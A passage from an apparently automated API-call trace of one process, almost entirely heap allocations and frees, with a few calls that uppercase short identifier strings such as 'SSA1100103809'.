(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f88 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa150 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0150.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa180 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.883] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0150.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa000 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0150.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0150.884] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0150.884] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0150.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa408 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73d28 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0150.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4b0 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0150.885] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa240 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0150.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa480 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d28 | out: hHeap=0x2af0000) returned 1 [0150.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa468 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72528 [0150.886] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0150.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa2a0 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa408 [0150.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa318 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0150.887] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0150.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0150.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72528 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0150.888] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0150.888] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0150.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0150.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0150.889] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0150.890] HeapFree (in: 